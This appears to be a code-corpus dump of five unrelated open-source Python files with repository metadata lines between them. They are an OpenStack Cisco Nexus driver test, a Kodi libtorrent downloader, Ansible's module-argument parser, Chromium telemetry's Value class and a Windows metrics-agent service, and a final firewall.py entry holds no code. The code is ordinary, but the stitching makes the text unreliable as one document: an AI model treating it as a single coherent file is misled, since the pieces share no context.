# Copyright (c) 2013 OpenStack Foundation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import collections import mock from oslo_utils import importutils import testtools from networking_cisco.plugins.ml2.drivers.cisco.nexus import ( nexus_network_driver) from networking_cisco.plugins.ml2.drivers.cisco.nexus import constants from networking_cisco.plugins.ml2.drivers.cisco.nexus import exceptions from networking_cisco.plugins.ml2.drivers.cisco.nexus import mech_cisco_nexus from networking_cisco.plugins.ml2.drivers.cisco.nexus import nexus_db_v2 from neutron.common import constants as n_const from neutron.extensions import portbindings from neutron.plugins.ml2 import driver_api as api from neutron.tests.unit import testlib_api NEXUS_IP_ADDRESS = '1.1.1.1' NEXUS_IP_ADDRESS_PC = '2.2.2.2' NEXUS_IP_ADDRESS_DUAL = '3.3.3.3' HOST_NAME_1 = 'testhost1' HOST_NAME_2 = 'testhost2' HOST_NAME_PC = 'testpchost' HOST_NAME_DUAL = 'testdualhost' INSTANCE_1 = 'testvm1' INSTANCE_2 = 'testvm2' INSTANCE_PC = 'testpcvm' INSTANCE_DUAL = 'testdualvm' NEXUS_PORT_1 = 'ethernet:1/10' NEXUS_PORT_2 = 'ethernet:1/20' NEXUS_PORTCHANNELS = 'portchannel:2' NEXUS_DUAL = 'ethernet:1/3,portchannel:2' VLAN_ID_1 = 267 VLAN_ID_2 = 265 VLAN_ID_PC = 268 VLAN_ID_DUAL = 269 DEVICE_OWNER = 'compute:test' NEXUS_SSH_PORT = '22' PORT_STATE = n_const.PORT_STATUS_ACTIVE NETWORK_TYPE = 'vlan' NEXUS_DRIVER = ('networking_cisco.plugins.ml2.drivers.cisco.nexus.' 'nexus_network_driver.CiscoNexusDriver') class FakeNetworkContext(object): """Network context for testing purposes only.""" def __init__(self, segment_id): self._network_segments = {api.SEGMENTATION_ID: segment_id, api.NETWORK_TYPE: NETWORK_TYPE} @property def network_segments(self): return self._network_segments class FakePortContext(object): """Port context for testing purposes only.""" def __init__(self, device_id, host_name, network_context): self._port = { 'status': PORT_STATE, 'device_id': device_id, 'device_owner': DEVICE_OWNER, portbindings.HOST_ID: host_name, portbindings.VIF_TYPE: portbindings.VIF_TYPE_OVS } self._network = network_context self._segment = network_context.network_segments @property def current(self): return self._port @property def network(self): return self._network @property def bottom_bound_segment(self): return self._segment class TestCiscoNexusDevice(testlib_api.SqlTestCase): """Unit tests for Cisco ML2 Nexus device driver.""" TestConfigObj = collections.namedtuple( 'TestConfigObj', 'nexus_ip_addr host_name nexus_port instance_id vlan_id') test_configs = { 'test_config1': TestConfigObj( NEXUS_IP_ADDRESS, HOST_NAME_1, NEXUS_PORT_1, INSTANCE_1, VLAN_ID_1), 'test_config2': TestConfigObj( NEXUS_IP_ADDRESS, HOST_NAME_2, NEXUS_PORT_2, INSTANCE_2, VLAN_ID_2), 'test_config_portchannel': TestConfigObj( NEXUS_IP_ADDRESS_PC, HOST_NAME_PC, NEXUS_PORTCHANNELS, INSTANCE_PC, VLAN_ID_PC), 'test_config_dual': TestConfigObj( NEXUS_IP_ADDRESS_DUAL, HOST_NAME_DUAL, NEXUS_DUAL, INSTANCE_DUAL, VLAN_ID_DUAL), } def setUp(self): """Sets up mock ncclient, and switch and credentials dictionaries.""" super(TestCiscoNexusDevice, self).setUp() # Use a mock netconf client mock_ncclient = mock.Mock() mock.patch.object(nexus_network_driver.CiscoNexusDriver, '_import_ncclient', return_value=mock_ncclient).start() def new_nexus_init(mech_instance): mech_instance.driver = importutils.import_object(NEXUS_DRIVER) mech_instance._nexus_switches = {} for name, config in TestCiscoNexusDevice.test_configs.items(): ip_addr = config.nexus_ip_addr host_name = config.host_name nexus_port = config.nexus_port mech_instance._nexus_switches[(ip_addr, host_name)] = nexus_port mech_instance._nexus_switches[(ip_addr, 'ssh_port')] = NEXUS_SSH_PORT mech_instance._nexus_switches[(ip_addr, constants.USERNAME)] = 'admin' mech_instance._nexus_switches[(ip_addr, constants.PASSWORD)] = 'password' mech_instance.driver.nexus_switches = ( mech_instance._nexus_switches) mock.patch.object(mech_cisco_nexus.CiscoNexusMechanismDriver, '__init__', new=new_nexus_init).start() self._cisco_mech_driver = (mech_cisco_nexus. CiscoNexusMechanismDriver()) def _create_delete_port(self, port_config): """Tests creation and deletion of a virtual port.""" nexus_ip_addr = port_config.nexus_ip_addr host_name = port_config.host_name nexus_port = port_config.nexus_port instance_id = port_config.instance_id vlan_id = port_config.vlan_id network_context = FakeNetworkContext(vlan_id) port_context = FakePortContext(instance_id, host_name, network_context) self._cisco_mech_driver.update_port_precommit(port_context) self._cisco_mech_driver.update_port_postcommit(port_context) for port_id in nexus_port.split(','): bindings = nexus_db_v2.get_nexusport_binding(port_id, vlan_id, nexus_ip_addr, instance_id) self.assertEqual(len(bindings), 1) self._cisco_mech_driver.delete_port_precommit(port_context) self._cisco_mech_driver.delete_port_postcommit(port_context) for port_id in nexus_port.split(','): with testtools.ExpectedException( exceptions.NexusPortBindingNotFound): nexus_db_v2.get_nexusport_binding(port_id, vlan_id, nexus_ip_addr, instance_id) def test_create_delete_ports(self): """Tests creation and deletion of two new virtual Ports.""" self._create_delete_port( TestCiscoNexusDevice.test_configs['test_config1']) self._create_delete_port( TestCiscoNexusDevice.test_configs['test_config2']) def test_create_delete_portchannel(self): """Tests creation of a port over a portchannel.""" self._create_delete_port( TestCiscoNexusDevice.test_configs['test_config_portchannel']) def test_create_delete_dual(self): """Tests creation and deletion of dual ports for single server""" self._create_delete_port( TestCiscoNexusDevice.test_configs['test_config_dual'])
apache-2.0
-1,957,225,653,470,041,300
35.591743
79
0.598471
false
alfa-addon/addon
plugin.video.alfa/lib/python_libtorrent/python_libtorrent/functions.py
1
10908
#-*- coding: utf-8 -*- ''' python-libtorrent for Kodi (script.module.libtorrent) Copyright (C) 2015-2016 DiMartino, srg70, RussakHH, aisman Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ''' from __future__ import absolute_import from builtins import object import sys PY3 = False if sys.version_info[0] >= 3: PY3 = True; unicode = str; unichr = chr; long = int import time import xbmc, xbmcgui, xbmcaddon from .net import HTTP from core import filetools ### Alfa from core import ziptools from platformcode import config ### Alfa #__libbaseurl__ = "https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent" __libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"] #__settings__ = xbmcaddon.Addon(id='script.module.libtorrent') #__version__ = __settings__.getAddonInfo('version') #__plugin__ = __settings__.getAddonInfo('name') + " v." + __version__ #__icon__= filetools.join(filetools.translatePath('special://home'), 'addons', # 'script.module.libtorrent', 'icon.png') #__settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa __version__ = '2.0.2' ### Alfa __plugin__ = "python-libtorrent v.2.0.2" ### Alfa __icon__= filetools.join(filetools.translatePath('special://home'), 'addons', 'plugin.video.alfa', 'icon.png') ### Alfa #__language__ = __settings__.getLocalizedString ### Alfa #from python_libtorrent.platform_pulsar import get_platform, get_libname ### Alfa from lib.python_libtorrent.python_libtorrent.platform_pulsar import get_platform, get_libname ### Alfa def log(msg): if PY3: try: xbmc.log("### [%s]: %s" % (__plugin__,msg,), level=xbmc.LOGINFO ) except UnicodeEncodeError: xbmc.log("### [%s]: %s" % (__plugin__,msg.encode("utf-8", "ignore"),), level=xbmc.LOGINFO ) except: xbmc.log("### [%s]: %s" % (__plugin__,'ERROR LOG',), level=xbmc.LOGINFO ) else: try: xbmc.log("### [%s]: %s" % (__plugin__,msg,), level=xbmc.LOGNOTICE ) except UnicodeEncodeError: xbmc.log("### [%s]: %s" % (__plugin__,msg.encode("utf-8", "ignore"),), level=xbmc.LOGNOTICE ) except: xbmc.log("### [%s]: %s" % (__plugin__,'ERROR LOG',), level=xbmc.LOGNOTICE ) def getSettingAsBool(setting): __settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa return __settings__.getSetting(setting).lower() == "true" class LibraryManager(object): def __init__(self, dest_path, platform): self.dest_path = dest_path self.platform = platform self.root=filetools.dirname(filetools.dirname(__file__)) ver1, ver2, ver3 = platform['version'].split('.') ### Alfa: resto método try: ver1 = int(ver1) ver2 = int(ver2) except: ver1 = 2 ver2 = 0 if ver1 > 1 or (ver1 == 1 and ver2 >= 2): global __libbaseurl__ __libbaseurl__ = ['https://github.com/alfa-addon/alfa-repo/raw/master/downloads/libtorrent', \ 'https://gitlab.com/addon-alfa/alfa-repo/-/raw/master/downloads/libtorrent'] else: __libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"] def check_exist(self, dest_path='', platform=''): if dest_path: self.dest_path = dest_path if platform: self.platform = platform for libname in get_libname(self.platform): if not filetools.exists(filetools.join(self.dest_path, libname)): return False return True def check_update(self): need_update=False for libname in get_libname(self.platform): if libname!='liblibtorrent.so': self.libpath = filetools.join(self.dest_path, libname) self.sizepath=filetools.join(self.root, self.platform['system'], self.platform['version'], libname+'.size.txt') size=str(filetools.getsize(self.libpath)) size_old=open( self.sizepath, "r" ).read() if size_old!=size: need_update=True return need_update def update(self, dest_path='', platform=''): if dest_path: self.dest_path = dest_path if platform: self.platform = platform if self.check_update(): for libname in get_libname(self.platform): self.libpath = filetools.join(self.dest_path, libname) filetools.remove(self.libpath) self.download() def download(self, dest_path='', platform=''): if dest_path: self.dest_path = dest_path if platform: self.platform = platform ver1, ver2, ver3 = platform['version'].split('.') ### Alfa: resto método try: ver1 = int(ver1) ver2 = int(ver2) except: ver1 = 2 ver2 = 0 if ver1 > 1 or (ver1 == 1 and ver2 >= 2): global __libbaseurl__ __libbaseurl__ = ['https://github.com/alfa-addon/alfa-repo/raw/master/downloads/libtorrent', \ 'https://gitlab.com/addon-alfa/alfa-repo/-/raw/master/downloads/libtorrent'] else: __libbaseurl__ = ["https://github.com/DiMartinoXBMC/script.module.libtorrent/raw/master/python_libtorrent"] __settings__ = xbmcaddon.Addon(id='plugin.video.alfa') ### Alfa filetools.mkdir(self.dest_path) for libname in get_libname(self.platform): p_version = self.platform['version'] if PY3: p_version += '_PY3' dest = filetools.join(self.dest_path, libname) log("try to fetch %s/%s/%s" % (self.platform['system'], p_version, libname)) for url_lib in __libbaseurl__: ### Alfa url = "%s/%s/%s/%s.zip" % (url_lib, self.platform['system'], p_version, libname) url_size = "%s/%s/%s/%s.size.txt" % (url_lib, self.platform['system'], p_version, libname) if libname!='liblibtorrent.so': try: self.http = HTTP() response = self.http.fetch(url, download=dest + ".zip", progress=False) ### Alfa log("%s -> %s" % (url, dest)) if response.code != 200: continue ### Alfa response = self.http.fetch(url_size, download=dest + '.size.txt', progress=False) ### Alfa log("%s -> %s" % (url_size, dest + '.size.txt')) if response.code != 200: continue ### Alfa try: unzipper = ziptools.ziptools() unzipper.extract("%s.zip" % dest, self.dest_path) except: xbmc.executebuiltin('Extract("%s.zip","%s")' % (dest, self.dest_path)) time.sleep(1) if filetools.exists(dest): filetools.remove(dest + ".zip") except: import traceback text = 'Failed download %s!' % libname log(text) log(traceback.format_exc(1)) #xbmc.executebuiltin("Notification(%s,%s,%s,%s)" % (__plugin__,text,750,__icon__)) continue else: filetools.copy(filetools.join(self.dest_path, 'libtorrent.so'), dest, silent=True) ### Alfa #dest_alfa = filetools.join(filetools.translatePath(__settings__.getAddonInfo('Path')), \ # 'lib', libname) ### Alfa #filetools.copy(dest, dest_alfa, silent=True) ### Alfa dest_alfa = filetools.join(filetools.translatePath(__settings__.getAddonInfo('Profile')), \ 'bin', libname) ### Alfa filetools.remove(dest_alfa, silent=True) filetools.copy(dest, dest_alfa, silent=True) ### Alfa break else: return False return True def android_workaround(self, new_dest_path): ### Alfa (entera) for libname in get_libname(self.platform): libpath = filetools.join(self.dest_path, libname) size = str(filetools.getsize(libpath)) new_libpath = filetools.join(new_dest_path, libname) if filetools.exists(new_libpath): new_size = str(filetools.getsize(new_libpath)) if size != new_size: res = filetools.remove(new_libpath, su=True) if res: log('Deleted: (%s) %s -> (%s) %s' %(size, libpath, new_size, new_libpath)) if not filetools.exists(new_libpath): res = filetools.copy(libpath, new_libpath, ch_mod='777', su=True) ### ALFA else: log('Module exists. Not copied... %s' % new_libpath) ### ALFA return new_dest_path
gpl-3.0
4,003,463,386,131,299,000
50.201878
127
0.530992
false
h4ck3rm1k3/ansible
v2/ansible/parsing/mod_args.py
1
10144
# (c) 2014 Michael DeHaan, <michael@ansible.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # Make coding more python3-ish from __future__ import (absolute_import, division, print_function) __metaclass__ = type from six import iteritems, string_types from types import NoneType from ansible.errors import AnsibleParserError from ansible.plugins import module_loader from ansible.parsing.splitter import parse_kv class ModuleArgsParser: """ There are several ways a module and argument set can be expressed: # legacy form (for a shell command) - action: shell echo hi # common shorthand for local actions vs delegate_to - local_action: shell echo hi # most commonly: - copy: src=a dest=b # legacy form - action: copy src=a dest=b # complex args form, for passing structured data - copy: src: a dest: b # gross, but technically legal - action: module: copy args: src: a dest: b # extra gross, but also legal. in this case, the args specified # will act as 'defaults' and will be overriden by any args specified # in one of the other formats (complex args under the action, or # parsed from the k=v string - command: 'pwd' args: chdir: '/tmp' This class has some of the logic to canonicalize these into the form - module: <module_name> delegate_to: <optional> args: <args> Args may also be munged for certain shell command parameters. """ def __init__(self, task_ds=dict()): assert isinstance(task_ds, dict) self._task_ds = task_ds def _split_module_string(self, str): ''' when module names are expressed like: action: copy src=a dest=b the first part of the string is the name of the module and the rest are strings pertaining to the arguments. ''' tokens = str.split() if len(tokens) > 1: return (tokens[0], " ".join(tokens[1:])) else: return (tokens[0], "") def _handle_shell_weirdness(self, action, args): ''' given an action name and an args dictionary, return the proper action name and args dictionary. This mostly is due to shell/command being treated special and nothing else ''' # don't handle non shell/command modules in this function # TODO: in terms of the whole app, should 'raw' also fit here? if action not in ['shell', 'command']: return (action, args) # the shell module really is the command module with an additional # parameter if action == 'shell': action = 'command' args['_uses_shell'] = True return (action, args) def _normalize_parameters(self, thing, action=None, additional_args=dict()): ''' arguments can be fuzzy. Deal with all the forms. ''' # final args are the ones we'll eventually return, so first update # them with any additional args specified, which have lower priority # than those which may be parsed/normalized next final_args = dict() if additional_args: final_args.update(additional_args) # how we normalize depends if we figured out what the module name is # yet. If we have already figured it out, it's an 'old style' invocation. # otherwise, it's not if action is not None: args = self._normalize_old_style_args(thing, action) else: (action, args) = self._normalize_new_style_args(thing) # this can occasionally happen, simplify if args and 'args' in args: args = args['args'] # finally, update the args we're going to return with the ones # which were normalized above if args: final_args.update(args) return (action, final_args) def _normalize_old_style_args(self, thing, action): ''' deals with fuzziness in old-style (action/local_action) module invocations returns tuple of (module_name, dictionary_args) possible example inputs: { 'local_action' : 'shell echo hi' } { 'action' : 'shell echo hi' } { 'local_action' : { 'module' : 'ec2', 'x' : 1, 'y': 2 }} standardized outputs like: ( 'command', { _raw_params: 'echo hi', _uses_shell: True } ''' if isinstance(thing, dict): # form is like: local_action: { module: 'xyz', x: 2, y: 3 } ... uncommon! args = thing elif isinstance(thing, string_types): # form is like: local_action: copy src=a dest=b ... pretty common check_raw = action in ('command', 'shell', 'script') args = parse_kv(thing, check_raw=check_raw) elif isinstance(thing, NoneType): # this can happen with modules which take no params, like ping: args = None else: raise AnsibleParserError("unexpected parameter type in action: %s" % type(thing), obj=self._task_ds) return args def _normalize_new_style_args(self, thing): ''' deals with fuzziness in new style module invocations accepting key=value pairs and dictionaries, and always returning dictionaries returns tuple of (module_name, dictionary_args) possible example inputs: { 'shell' : 'echo hi' } { 'ec2' : { 'region' : 'xyz' } { 'ec2' : 'region=xyz' } standardized outputs like: ('ec2', { region: 'xyz'} ) ''' action = None args = None if isinstance(thing, dict): # form is like: copy: { src: 'a', dest: 'b' } ... common for structured (aka "complex") args thing = thing.copy() if 'module' in thing: action = thing['module'] args = thing.copy() del args['module'] elif isinstance(thing, string_types): # form is like: copy: src=a dest=b ... common shorthand throughout ansible (action, args) = self._split_module_string(thing) check_raw = action in ('command', 'shell', 'script') args = parse_kv(args, check_raw=check_raw) else: # need a dict or a string, so giving up raise AnsibleParserError("unexpected parameter type in action: %s" % type(thing), obj=self._task_ds) return (action, args) def parse(self): ''' Given a task in one of the supported forms, parses and returns returns the action, arguments, and delegate_to values for the task, dealing with all sorts of levels of fuzziness. ''' thing = None action = None delegate_to = None args = dict() # # We can have one of action, local_action, or module specified # # this is the 'extra gross' scenario detailed above, so we grab # the args and pass them in as additional arguments, which can/will # be overwritten via dict updates from the other arg sources below # FIXME: add test cases for this additional_args = self._task_ds.get('args', dict()) # action if 'action' in self._task_ds: # an old school 'action' statement thing = self._task_ds['action'] delegate_to = None action, args = self._normalize_parameters(thing, additional_args=additional_args) # local_action if 'local_action' in self._task_ds: # local_action is similar but also implies a delegate_to if action is not None: raise AnsibleParserError("action and local_action are mutually exclusive", obj=self._task_ds) thing = self._task_ds.get('local_action', '') delegate_to = 'localhost' action, args = self._normalize_parameters(thing, additional_args=additional_args) # module: <stuff> is the more new-style invocation # walk the input dictionary to see we recognize a module name for (item, value) in iteritems(self._task_ds): if item in module_loader or item == 'meta': # finding more than one module name is a problem if action is not None: raise AnsibleParserError("conflicting action statements", obj=self._task_ds) action = item thing = value action, args = self._normalize_parameters(value, action=action, additional_args=additional_args) # if we didn't see any module in the task at all, it's not a task really if action is None: raise AnsibleParserError("no action detected in task", obj=self._task_ds) # FIXME: disabled for now, as there are other places besides the shell/script modules where # having variables as the sole param for the module is valid (include_vars, add_host, and group_by?) #elif args.get('_raw_params', '') != '' and action not in ('command', 'shell', 'script', 'include_vars'): # raise AnsibleParserError("this task has extra params, which is only allowed in the command, shell or script module.", obj=self._task_ds) # shell modules require special handling (action, args) = self._handle_shell_weirdness(action, args) return (action, args, delegate_to)
gpl-3.0
-3,236,003,832,605,205,000
35.489209
149
0.605185
false
sgraham/nope
tools/telemetry/telemetry/value/__init__.py
1
12490
# Copyright 2014 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """ The Value hierarchy provides a way of representing the values measurements produce such that they can be merged across runs, grouped by page, and output to different targets. The core Value concept provides the basic functionality: - association with a page, may be none - naming and units - importance tracking [whether a value will show up on a waterfall or output file by default] - other metadata, such as a description of what was measured - default conversion to scalar and string - merging properties A page may actually run a few times during a single telemetry session. Downstream consumers of test results typically want to group these runs together, then compute summary statistics across runs. Value provides the Merge* family of methods for this kind of aggregation. """ import os from telemetry.core import discover from telemetry.core import util # When combining a pair of Values togehter, it is sometimes ambiguous whether # the values should be concatenated, or one should be picked as representative. # The possible merging policies are listed here. CONCATENATE = 'concatenate' PICK_FIRST = 'pick-first' # When converting a Value to its buildbot equivalent, the context in which the # value is being interpreted actually affects the conversion. This is insane, # but there you have it. There are three contexts in which Values are converted # for use by buildbot, represented by these output-intent values. PER_PAGE_RESULT_OUTPUT_CONTEXT = 'per-page-result-output-context' COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT = 'merged-pages-result-output-context' SUMMARY_RESULT_OUTPUT_CONTEXT = 'summary-result-output-context' class Value(object): """An abstract value produced by a telemetry page test. """ def __init__(self, page, name, units, important, description, interaction_record): """A generic Value object. Args: page: A Page object, may be given as None to indicate that the value represents results for multiple pages. name: A value name string, may contain a dot. Values from the same test with the same prefix before the dot may be considered to belong to the same chart. units: A units string. important: Whether the value is "important". Causes the value to appear by default in downstream UIs. description: A string explaining in human-understandable terms what this value represents. interaction_record: The string label of the TimelineInteractionRecord with which this value is associated. """ # TODO(eakuefner): Check user story here after migration (crbug.com/442036) if not isinstance(name, basestring): raise ValueError('name field of Value must be string.') if not isinstance(units, basestring): raise ValueError('units field of Value must be string.') if not isinstance(important, bool): raise ValueError('important field of Value must be bool.') if not ((description is None) or isinstance(description, basestring)): raise ValueError('description field of Value must absent or string.') if not ((interaction_record is None) or isinstance(interaction_record, basestring)): raise ValueError('interaction_record field of Value must absent or ' 'string.') self.page = page self.name = name self.units = units self.important = important self.description = description self.interaction_record = interaction_record def IsMergableWith(self, that): return (self.units == that.units and type(self) == type(that) and self.important == that.important and self.interaction_record == that.interaction_record) @classmethod def MergeLikeValuesFromSamePage(cls, values): """Combines the provided list of values into a single compound value. When a page runs multiple times, it may produce multiple values. This function is given the same-named values across the multiple runs, and has the responsibility of producing a single result. It must return a single Value. If merging does not make sense, the implementation must pick a representative value from one of the runs. For instance, it may be given [ScalarValue(page, 'a', 1), ScalarValue(page, 'a', 2)] and it might produce ListOfScalarValues(page, 'a', [1, 2]) """ raise NotImplementedError() @classmethod def MergeLikeValuesFromDifferentPages(cls, values, group_by_name_suffix=False): """Combines the provided values into a single compound value. When a full pageset runs, a single value_name will usually end up getting collected for multiple pages. For instance, we may end up with [ScalarValue(page1, 'a', 1), ScalarValue(page2, 'a', 2)] This function takes in the values of the same name, but across multiple pages, and produces a single summary result value. In this instance, it could produce a ScalarValue(None, 'a', 1.5) to indicate averaging, or even ListOfScalarValues(None, 'a', [1, 2]) if concatenated output was desired. Some results are so specific to a page that they make no sense when aggregated across pages. If merging values of this type across pages is non-sensical, this method may return None. If group_by_name_suffix is True, then x.z and y.z are considered to be the same value and are grouped together. If false, then x.z and y.z are considered different. """ raise NotImplementedError() def _IsImportantGivenOutputIntent(self, output_context): if output_context == PER_PAGE_RESULT_OUTPUT_CONTEXT: return False elif output_context == COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT: return self.important elif output_context == SUMMARY_RESULT_OUTPUT_CONTEXT: return self.important def GetBuildbotDataType(self, output_context): """Returns the buildbot's equivalent data_type. This should be one of the values accepted by perf_tests_results_helper.py. """ raise NotImplementedError() def GetBuildbotValue(self): """Returns the buildbot's equivalent value.""" raise NotImplementedError() def GetChartAndTraceNameForPerPageResult(self): chart_name, _ = _ConvertValueNameToChartAndTraceName(self.name) trace_name = self.page.display_name return chart_name, trace_name @property def name_suffix(self): """Returns the string after a . in the name, or the full name otherwise.""" if '.' in self.name: return self.name.split('.', 1)[1] else: return self.name def GetChartAndTraceNameForComputedSummaryResult( self, trace_tag): chart_name, trace_name = ( _ConvertValueNameToChartAndTraceName(self.name)) if trace_tag: return chart_name, trace_name + trace_tag else: return chart_name, trace_name def GetRepresentativeNumber(self): """Gets a single scalar value that best-represents this value. Returns None if not possible. """ raise NotImplementedError() def GetRepresentativeString(self): """Gets a string value that best-represents this value. Returns None if not possible. """ raise NotImplementedError() @staticmethod def GetJSONTypeName(): """Gets the typename for serialization to JSON using AsDict.""" raise NotImplementedError() def AsDict(self): """Pre-serializes a value to a dict for output as JSON.""" return self._AsDictImpl() def _AsDictImpl(self): d = { 'name': self.name, 'type': self.GetJSONTypeName(), 'units': self.units, 'important': self.important } if self.description: d['description'] = self.description if self.interaction_record: d['interaction_record'] = self.interaction_record if self.page: d['page_id'] = self.page.id return d def AsDictWithoutBaseClassEntries(self): full_dict = self.AsDict() base_dict_keys = set(self._AsDictImpl().keys()) # Extracts only entries added by the subclass. return dict([(k, v) for (k, v) in full_dict.iteritems() if k not in base_dict_keys]) @staticmethod def FromDict(value_dict, page_dict): """Produces a value from a value dict and a page dict. Value dicts are produced by serialization to JSON, and must be accompanied by a dict mapping page IDs to pages, also produced by serialization, in order to be completely deserialized. If deserializing multiple values, use ListOfValuesFromListOfDicts instead. value_dict: a dictionary produced by AsDict() on a value subclass. page_dict: a dictionary mapping IDs to page objects. """ return Value.ListOfValuesFromListOfDicts([value_dict], page_dict)[0] @staticmethod def ListOfValuesFromListOfDicts(value_dicts, page_dict): """Takes a list of value dicts to values. Given a list of value dicts produced by AsDict, this method deserializes the dicts given a dict mapping page IDs to pages. This method performs memoization for deserializing a list of values efficiently, where FromDict is meant to handle one-offs. values: a list of value dicts produced by AsDict() on a value subclass. page_dict: a dictionary mapping IDs to page objects. """ value_dir = os.path.dirname(__file__) value_classes = discover.DiscoverClasses( value_dir, util.GetTelemetryDir(), Value, index_by_class_name=True) value_json_types = dict((value_classes[x].GetJSONTypeName(), x) for x in value_classes) values = [] for value_dict in value_dicts: value_class = value_classes[value_json_types[value_dict['type']]] assert 'FromDict' in value_class.__dict__, \ 'Subclass doesn\'t override FromDict' values.append(value_class.FromDict(value_dict, page_dict)) return values @staticmethod def GetConstructorKwArgs(value_dict, page_dict): """Produces constructor arguments from a value dict and a page dict. Takes a dict parsed from JSON and an index of pages and recovers the keyword arguments to be passed to the constructor for deserializing the dict. value_dict: a dictionary produced by AsDict() on a value subclass. page_dict: a dictionary mapping IDs to page objects. """ d = { 'name': value_dict['name'], 'units': value_dict['units'] } description = value_dict.get('description', None) if description: d['description'] = description else: d['description'] = None page_id = value_dict.get('page_id', None) if page_id: d['page'] = page_dict[int(page_id)] else: d['page'] = None d['important'] = False interaction_record = value_dict.get('interaction_record', None) if interaction_record: d['interaction_record'] = interaction_record else: d['interaction_record'] = None return d def ValueNameFromTraceAndChartName(trace_name, chart_name=None): """Mangles a trace name plus optional chart name into a standard string. A value might just be a bareword name, e.g. numPixels. In that case, its chart may be None. But, a value might also be intended for display with other values, in which case the chart name indicates that grouping. So, you might have screen.numPixels, screen.resolution, where chartName='screen'. """ assert trace_name != 'url', 'The name url cannot be used' if chart_name: return '%s.%s' % (chart_name, trace_name) else: assert '.' not in trace_name, ('Trace names cannot contain "." with an ' 'empty chart_name since this is used to delimit chart_name.trace_name.') return trace_name def _ConvertValueNameToChartAndTraceName(value_name): """Converts a value_name into the equivalent chart-trace name pair. Buildbot represents values by the measurement name and an optional trace name, whereas telemetry represents values with a chart_name.trace_name convention, where chart_name is optional. This convention is also used by chart_json. This converts from the telemetry convention to the buildbot convention, returning a 2-tuple (measurement_name, trace_name). """ if '.' in value_name: return value_name.split('.', 1) else: return value_name, value_name
bsd-3-clause
4,884,086,111,514,157,000
36.172619
80
0.703283
false
loadimpact/loadimpact-server-metrics
li_metrics_agent_service.py
1
2556
#!/usr/bin/env python # coding=utf-8 """ Copyright 2012 Load Impact Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import li_metrics_agent import threading import win32service import win32serviceutil import win32event import servicemanager import sys __author__ = "Load Impact" __copyright__ = "Copyright 2012, Load Impact" __license__ = "Apache License v2.0" __version__ = "1.1.1" __email__ = "support@loadimpact.com" class AgentThread(threading.Thread): def __init__(self): super(AgentThread, self).__init__() self.agent_loop = li_metrics_agent.AgentLoop() def run(self): self.agent_loop.run() def stop(self): self.agent_loop.stop() class AgentService(win32serviceutil.ServiceFramework): _svc_name_ = "LoadImpactServerMetricsAgent" _svc_display_name_ = "Load Impact server metrics agent" _svc_description_ = ("Agent for collecting and reporting server metrics " "to loadimpact.com") # init service framework def __init__(self, args): win32serviceutil.ServiceFramework.__init__(self, args) # listen for a stop request self.hWaitStop = win32event.CreateEvent(None, 0, 0, None) def SvcDoRun(self): #import servicemanager rc = None self.ReportServiceStatus(win32service.SERVICE_RUNNING) self.agent = AgentThread() self.agent.start() # loop until the stop event fires while rc != win32event.WAIT_OBJECT_0: # block for 5 seconds and listen for a stop event rc = win32event.WaitForSingleObject(self.hWaitStop, 1000) def SvcStop(self): self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING) self.agent.stop() self.agent.join() win32event.SetEvent(self.hWaitStop) if __name__ == '__main__': if len(sys.argv) == 1: servicemanager.Initialize() servicemanager.PrepareToHostSingle(AgentService) servicemanager.StartServiceCtrlDispatcher() else: win32serviceutil.HandleCommandLine(AgentService)
apache-2.0
-4,460,066,151,057,241,600
30.170732
77
0.687402
false
alexliyu/CDMSYSTEM
firewall.py
1
1273
